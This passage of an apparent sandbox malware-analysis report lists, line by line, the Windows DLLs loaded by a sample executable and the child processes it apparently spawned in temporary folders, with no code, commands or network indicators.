Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winmm.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: sspicli.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wininet.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ncrypt.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ntasn1.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iertutil.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: windows.storage.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: wldp.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: profapi.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winhttp.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: mswsock.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: winnsi.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: urlmon.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: srvcli.dll
Source: C:\Users\user\1000015002\b74664dd7e.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: msisip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: wshext.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: appxsip.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: opcservices.dll
